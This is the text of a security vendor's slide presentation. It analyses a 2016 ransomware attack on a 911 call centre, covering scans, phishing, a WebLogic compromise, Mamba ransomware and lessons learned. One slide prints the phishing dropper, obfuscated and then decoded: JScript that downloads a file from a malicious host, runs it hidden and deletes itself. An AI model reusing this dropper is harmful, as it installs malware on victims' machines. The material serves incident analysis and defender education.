PSAP Cyber Attack: A Thanksgiving Story
Cybersecurity for Public Safety Timothy Lorello – President & CEO of SecuLore Solutions
“We Protect Our Nation’s Most Important Number: 9-1-1!”
Tim Lorello - CEO
• Former CMO (TCS)
• 15+ years public safety
• 5+ years cybersecurity
• 30+ years telecomm
• Guidance to FCC
• BA Physics, MSEE
• 20 patents
Presenter
Free Thanksgiving Rides in San Francisco – Reprise for a PSAP
Recent PSAP Attacks
Setting the Stage
Before Thanksgiving
Thanksgiving Fog
No Turkey Dinner for You
Thanksgiving Blessings – Lessons Learned
Q&A
Agenda
‘You Hacked,’ Cyber Attackers Crash Muni Computer System Across SF (CBS SF Bay Area, 11/26/2016)
Hackers Breached San Francisco’s Transit System and Demanded a Ransom (Slate Future Tense, 11/28/2016)
It Looks Like the San Francisco Muni Hack Was Worse Than We Thought (Gizmodo, 11/28/2016)
Hackers Threaten to Release 30GB of Stolen Data From San Francisco’s Municipal Railway (Fortune, 11/28/2016)
Security analysts: Muni hack should be wake-up call to other agencies (East Bay Times, 11/28/2016)
San Francisco Rail System Hacker Hacked (KrebsOnSecurity, 11/29/2016)
SF Muni hack contained. Next transit hack could be train wreck (C|Net – 11/29/2016)
San Francisco Railway ‘Never Considered Paying the Ransom’ To Hackers (Fortune, 11/29/2016)
The Great Train Robbery,
cybercrime style
Free Rides in San Francisco!
5 05/16/2017
Collinsville [Alabama] Police Department Hit by Ransomware Trojan (6/2014)
Virus Wipes Out [New Hampshire] Police Department’s Computers (6/2014)
Cyber attack temporarily shut down Newark [New Jersey] police computer systems (6/2014)
Dickson [Tennessee] Sheriff’s Office pays ransom to cyber criminals (11/2014)
Suburban Chicago [Illinois] PD Forced To Pay A Hacker $500 Ransom For Its Own Files (2/2015)
Tewksbury [Massachusetts] Police Department Pays $500 Bitcoin Ransom to Hackers (4/2015)
Bitcoin ransom paid for Lincoln County [Maine] police data blocked by computer virus (4/2015)
Recent PSAP Attacks – Momentum (2014 & 2015)
6 05/16/2017
Janesville [Wisconsin] computer systems hit by virus, likely ‘ransomware’ (1/2016)
[Arizona] Superior Court Attacked By Ransomware (2/2016)
Melrose [Massachusetts] Police Pay 1 Bitcoin to Get Rid of Ransomware (2/2016)
Medfield [Massachusetts] paid hackers a $300 ransom to ‘unlock’ the town network (2/2016)
City of Durham [North Carolina] avoids ransomware threat by backing up data (2/2016)
Alto [Texas] city office battles ransomware issue (3/2016)
Ransomware virus infects Pinal County [Arizona] Attorney’s Office case files (5/2016)
Hackers hit upstate [New York] municipalities with ransomware (5/2016)
Hackers hit Larimer County [Colorado], services impacted (6/2016)
Town of Palm Beach [Florida] fights ransomware attack on 911 system (6/2016)
Virus hits Prior Lake [Minnesota] server; resident data not likely breached (6/2016)
Recent PSAP Attacks – Momentum (1H2016)
7 05/16/2017
City takes swift action after ransomware infects Honolulu [Hawaii] Fire Department computers (9/2016)
Crow Wing County [Minnesota] Board: Back up or pay up: County fights against ransomware (9/2016)
Springfield [Tennessee] City Hall recovers from ransomware attack (9/2016)
Palmhurst [Texas] Police Department Avoids Data Loss (9/2016)
Mount Holly Springs [Pennsylvania] police fall victim to cyber attack (10/2016)
Ransomware Result: Free Ticket to Ride in San Francisco [California] (11/2016)
Ransomware targets Howard County [Indiana] government (11/2016)
Madison Co. [Indiana] government servers fall victim to hackers, ransomware (11/2016)
[Arkansas] sheriff's office hit by ransomware pays hackers (12/2016)
Mount Pleasant [South Carolina] Police Department hit with ransomware cyberattack (12/2016)
Woodbury County [Iowa] Ransomware Attack Leaves Thousands of Files Compromised (7/2016)
Wadena City [Minnesota] computers infected with virus (7/2016)
[Florida] City of Sarasota's system hacked by ransomware, data held hostage (8/2016)
Recent PSAP Attacks – Momentum (2H 2016)
8 05/16/2017
PSAP Network
Web Server
Email ISP for
Network
ISP for Web
Web Server Web
Server Web Server
WS WS WS WS
WS
Ro
ute
r
Fir
ewal
l
Monitor inside traffic
Alerts sent to SOC
Monitor outside traffic
Full data capture
4 Layers of Protection
Web reputation
Firewall
Email antispam
Workstation antivirus
Web Rep
AV
AV
AV
AV
AV
Em
ail
An
tisp
am
Setting the Stage – A County Prepared
Setting the Stage – Timeline of Suspicious Activity
1600 0800 0000
11/23
0800 1600 0000
11/24
SecuLore Monitoring begins: 11/22 1610 SecuLore Monitoring ends: 11/24 2058
1600 2000
1600 0800 0000
11/23
0800 1600 0000
11/24
Suspicious scans noticed: 11/22 1641 Last suspicious scan noticed: 0751
1600 2000
Before Thanksgiving – The Vulnerability Scans SecuLore Monitoring ends: 11/24 2058 SecuLore Monitoring begins: 11/22 1610
Logs
IT Network Administrative
Call Takers Public Safety
Datasets Public Safety
Answering
Point
Network
Provider
Attacker may:
1) Probe the network
2) Send continuous interrogations
3) Send continuous phishing attacks
An email attack, intended to
cause the victim to make a
selection installs malware on the
victim’s machine
Hacker rents
an exploit kit
“Command and Control” server
Ransomware: It Starts with Finding a Way In
12 05/16/2017
Step One The Scan
4 countries associated with this hacker’s MO
Thanksgiving PSAP Attack: Vulnerability Scan
Date-Time IP Address Location Enterprise 11/22-11:41:09 37.27.240.82 Tehran, Iran Pars Online PJS 11/22-11:52:07 134.255.200.168 <Unknown>, Iran Pars Online PJS 11/22-13:00:38 151.235.157.24 <Unknown>, Iran Information Technology Company (ITC) 11/22-13:27:59 37.98.224.225 Karkh, Iraq ScopeSky Communication and Internet Ltd. 11/22-13:36:25 5.78.254.96 Tehran, Iran Pars Online PJS 11/22-13:36:25 122.160.165.154 Faridabad, India Bharti Airtel Ltd., Telemedia Services 11/22-13:40:36 125.63.83.212 Borivali West, India CITYCOM NETWORKS PVT LTD 11/22-14:10:33 188.212.79.86 Arak, Iran Telecommunication Infrastructure Company 11/22-15:02:18 188.212.197.158 Bucharest, Romania Massive Telecom SRL 11/22-15:53:46 109.230.251.7 Tehran, Iran Pars Online PJS 11/22-16:27:06 85.114.138.63 Shadabad, Iran Respina Networks & Beyond PJSC 11/22-16:43:28 85.114.138.63 Ho Chi Minh City, Vietnam Viettel Corporation 11/22-22:39:47 115.78.4.236 Ho Chi Minh City, Vietnam Viettel Corporation 11/22-22:41:50 115.78.162.144 Ho Chi Minh City, Vietnam Viettel Corporation 11/22-22:41:50 45.115.107.133 Noida, India Ultranet services private limited 11/22-22:52:29 151.235.188.66 Tehran, Iran Information Technology Company (ITC) 11/22-22:52:29 5.123.250.13 <Unknown>, Iran Iran Cell Service and Communication Company <continues> <continues> <continues> <continues> 11/23-07:51:07 122.171.176.182 Bengaluru, India Bharti Airtel Ltd., Telemedia Services
The Vulnerability Scan: Suspicious IPs
1600 0800 0000
11/23
0800 1600 0000
11/24
1600 2000
The Phishing Attack That Wasn’t
Phishing email last:
0738
Phish to Target A:
1316
Target A infected:
1339
Phishing email starts:
0537
Suspicious scans noticed: 11/22 1641 Last suspicious scan noticed: 0751
SecuLore Monitoring ends: 11/24 2058 SecuLore Monitoring begins: 11/22 1610
Step Two The Fake
Phishing emails
Thanksgiving PSAP Attack: The Fake
Came from many countries – but most from US!
Phishing
Phishing + Social Engineering = Spear Phishing
Spear Phishing + Top Dogs = Whaling
Cyber Attackers Love to Phish
var snodce = usakrizq + arlynsyhgyz + jolivevb2 + ijkeriqy0 + ijbihomipw + popogpi2 + zaltikihp; var ubciwo = okotict0 + rokmoruly; var catky = sjoracrudqi + hsujtykyrly3 + gijadul + udiplejow7; var alatu = ilpafofwet + ywtaxnatni2; var ivuxy = avxutqimgilp5 + boneqe0 + uvcemveryz + wexquzranvy + ragohipga1 + lcowenbism1; var kcumsurhi = ikahetkicv9 + dazepweb + oshydzihy1 + ijpofuzdaxw9; var lleqso = lunyltofi0 + gnawiwaz5; var ozbipert = zedrotivl0 + ldetymlu; var ubokbal = ukbazukne + jamwofiso; var xixaha = jrehoqu; var elmazfy = hrokwukgejo + yhfoqcizte6; var ogfuwn = agovraruh + rvobmewa; var wijne = hozmimwy6 + elkogdav0 + izywmuhlaq0 + pmyjkuse1; var megory = arydzojib + asvycyhvuz4 + tmubitral; var epbuml = yrqebfigw + elomgyl1; var hwylzo = cykkiwo1; var npaxuqb = gjagupfa + aryqigohv4 + bnyzoni6 + fewlojohy0; var abpodg = uxryhuvxe; var zynnaxu9 = new ActiveXObject(izpekmic1 + bxehjebucse0 + oktyromca + suqyztizv1 + bdufupvod + vserburehdu + fonryvtoqj + embyshovhaw8 + iccakbyjm0); var jnunypno2 = zynnaxu9[[snodce][0]](alehyvpa); switch (jnunypno2[[ubciwo][0]] > 4) { case true: var lelaxfuzsy5 = new Function(lyxexry + zahzonun6 + ozvimlibyc0 + ewpedux + evrasytyl0 + yzazym)(); break; } var khohawji = qsixhirohw + rsugqosenv3 + zjifizu + setzamyng; var kynro7 = new lelaxfuzsy5(khohawji); var jewboha = apinejqivf2 + ucfuzusfutd + gputizaqqu + oklepewyv2 + adutoflu3; var ilyqoz5 = seskublom7 + ypjokwuln + tygorgoqo7; var orawjagd = exdidoc5 + ysazsigvy + kimzymgi + wuqavxuwba + fqovwihho3 + elbibogab + ircusfaqy6 + xofufwinpe0 + afosork5 + yrumgahka + vykoscu + etybbili + nvaksolomgu8 + lvejfobno9; var azelup = qjeczerhasy + ertofudlesk + animzisqah + cevymsada5 + ydmytqon + nehhehus2 + otjiqazqecv + idojuk + eqvatokso2; var kyppaqaze = new lelaxfuzsy5(ilyqoz5); var uswufga0 = abpodg[[catky][0]]; kyppaqaze[[alatu][0]]();
The phishing email was:
Encoded
Zipped
and zipped again
Obfuscated
PSAP Successfully Phished – The Word Puzzle
var SL_AXOscriptingFilesystem = new ActiveXObject(scripting.FilesystemObject);
var SL_AbsPathName = SL_AXOscriptingFilesystem.GetAbsolutePathName(1);
switch (SL_AbsPathName.length > 4) {
case true:
var SL_AXO = new Function(return ActiveXObject;)();
break;
}
var SL_XMLHTTP = new SL_AXO(MSXML2.XMLHTTP);
var SL_AXOStream = new SL_AXO(ADODB.Stream);
SL_AXOStream.Open();
var SL_AXOScriptFileSystem = new SL_AXO(Scripting.FileSystemObject);
var SL_SpecialFolder = SL_AXOScriptFileSystem.GetSpecialFolder(2) \\\SL_AXOScriptFileSystem. GetTempName();
SL_XMLHTTP.open(GET, http://www.gooholtan.wang/log.php?f=2.dat, 0);
SL_AXOStream.Position = 0;
SL_AXOStream.Type = 1;
var SL_WShell = new SL_AXO(WScript.Shell);
SL_XMLHTTP.send();
if (SL_XMLHTTP.Status == 200) {
SL_AXOStream.Write( SL_XMLHTTP.ResponseBody);
SL_AXOStream.SaveToFile(SL_SpecialFolder);
SL_AXOStream.Close();
SL_WShell.run(cmd.exe /c SL_SpecialFolder, 0);
}
SL_AXOScriptFileSystem.deleteFile(WScript.ScriptFullName);
PSAP Successfully Phished – Puzzle Solved
var SL_AXOscriptingFilesystem = new ActiveXObject(scripting.FilesystemObject);
var SL_AbsPathName = SL_AXOscriptingFilesystem.GetAbsolutePathName(1);
switch (SL_AbsPathName.length > 4) {
case true:
var SL_AXO = new Function(return ActiveXObject;)();
break;
}
var SL_XMLHTTP = new SL_AXO(MSXML2.XMLHTTP);
var SL_AXOStream = new SL_AXO(ADODB.Stream);
SL_AXOStream.Open();
var SL_AXOScriptFileSystem = new SL_AXO(Scripting.FileSystemObject);
var SL_SpecialFolder = SL_AXOScriptFileSystem.GetSpecialFolder(2) \\\SL_AXOScriptFileSystem. GetTempName();
SL_XMLHTTP.open(GET, http://www.gooholtan.wang/log.php?f=2.dat, 0); SL_AXOStream.Position = 0;
SL_AXOStream.Type = 1;
var SL_WShell = new SL_AXO(WScript.Shell);
SL_XMLHTTP.send();
if (SL_XMLHTTP.Status == 200) {
SL_AXOStream.Write( SL_XMLHTTP.ResponseBody);
SL_AXOStream.SaveToFile(SL_SpecialFolder);
SL_AXOStream.Close();
SL_WShell.run(cmd.exe /c SL_SpecialFolder, 0);
}
SL_AXOScriptFileSystem.deleteFile(WScript.ScriptFullName);
PSAP Successfully Phished – Puzzle Solved
But this web site request was blocked!
21 05/16/2017
PSAP Network
Web Server
Email ISP for
Network
ISP for Web
Web Server Web
Server Web Server
WS WS WS WS
WS
Ro
ute
r
Fir
ewal
l
Monitor inside traffic
Alerts sent to SOC
Monitor outside traffic
Full data capture
4 Layers of Protection
Web reputation
Firewall
Email antispam
Workstation antivirus
Web Rep
AV
AV
AV
AV
AV
Em
ail
An
tisp
am
If Not Phishing, Then What?
Web Server Mamba
Employee Phish
1600 0800 0000
11/23
0800 1600 0000
11/24
SecuLore Monitoring begins: 11/22 1610
Suspicious scans noticed: 11/22 1641
SecuLore Monitoring ends: 11/24 2058
Last suspicious scan noticed: 0751
1600 2000
No Turkey Dinner for You – The Mamba Attack
Phishing email last:
0738
Phish to Target A:
1316
Target A infected:
1339
Phishing email starts:
0537
Mamba install: 0754
Mamba begins: 0541
Mamba noticed:
1657
Step Three The Strike
Time WebLogic Attack Brief Description Attacker Information
11/24-07:34 Tor Exit Node Detected Source IP = 185.129.62.63 Copenhagen, Denmark
11/24-07:34 Vulnerability found css.jsp
11/24-07:38 Active Directory info "C:\temp\com.csv" uploaded to attacker
11/24-07:39 Possible target list "list.txt" downloaded to target
Mamba ransomware loaded "output.zip" downloaded to target
11/24-08:02 Status being checked Source IP = 46.166.148.176 <Unknown City>, Netherlands
11/24-08:10 Status being checked Source IP = 176.126.252.12 <Unknown City>, Romania
11/24-08:12 Status being checked Source IP = 81.7.13.181 <Unknown City>, Germany
11/24-08:34 Status being checked Source IP = 176.10.99.207 <Unknown City>, Switzerland
11/24-08:36 Status being checked Source IP = 168.1.6.51 Sydney, Australia
11/24-08:37 Status being checked Source IP = 193.90.12.90 Oslo, Norway
11/24-08:46 Status being checked Source IP = 199.68.196.124 San Jose, United States
11/24-08:55 Status being checked Source IP = 37.130.227.133 <Unknown City>, UK
11/24-11:41 Status being checked Source IP = 173.208.213.114 Kansas City, United States
11/24-12:09 Status being checked Source IP = 176.31.7.241 <Unknown City>, France
11/24-12:29 Status being checked "log_file.txt" Mamba file uploaded to attacker
11/24-13:33 Status being checked Source IP = 171.25.193.78 <Unknown City>, Sweden
11/24-13:57 Status being checked Source IP = 37.187.129.166 <Unknown City>, France
11/24-14:21 Status being checked Source IP = 216.244.66.231 Seattle, United States
11/24-14:35 779 bytes FTP'd to attacker Source IP = 37.187.129.166 <Unknown City>, France
11/24-14:38 Last interaction detected SecuLore monitoring removed
The attacker origin automatically moved(courtesy of The Onion Router (TOR)
Case Study: The Scan – The Fake – The Strike
Logs
IT Network Administrative
Call Takers Public Safety
Datasets Public Safety
Answering
Point
Network
Provider
Attacker kept moving to new servers and
continued the attack
Blocking would be very difficult unless
blocking on behavior
A Polymorphic Attack Vector
25 05/16/2017
• Employee system was compromised via email phishing campaign – NOT the culprit! – Email phishing campaign was conducted against multiple email addresses
– Anti-virus software stopped approximately 38% of attacks seen
– One employee was tricked into opening an offensive document, infecting the machine The workstation reached out for malicious malware –it was stopped
Mamba ransomware later encrypted drive, destroying remaining evidence
• Web Server was compromised – Attacker used known vulnerabilities against WebLogic server
– Attack compromised 6 of 8 available call-taker workstations
– Delivered “Mamba” ransomware to over 100 servers and workstations Mamba does full-drive encryption, disabling entire system
Mamba looks for and encrypts all shared storage drives as well
• Small data transfer occurred with Russian Server – Seen shortly after email phishing attack
– Not related to ransomware attack
• Remote process execution console (psexecsvc.exe) detected on various servers – Not related to ransomware attack
• Adware/malware seen on multiple systems – Not suspected of malicious activity (but confusing)
Five separate malicious
activities
Attack spanned 44 hours
IT team wrestled for 3½ days
3 months later, still
recovering
The Thanksgiving PSAP Cyber Attack: Mystery Unraveled
Patch Your Systems (vendors too!)
Train Your Staff
Keep complete/regular backups
Let Your IT Staff Show Their Abilities!
Monitor – Visualize - Protect
The Thanksgiving PSAP Cyber Attack: Lessons Learned
PSAP Cyber Attack: A Thanksgiving Story
Timothy Lorello President & CEO
“We Protect Our Nation’s Most Important Number: 9-1-1!”
PSAP Cyber Attack: A Thanksgiving Story
Timothy Lorello President & CEO
“We Protect Our Nation’s Most Important Number: 9-1-1!”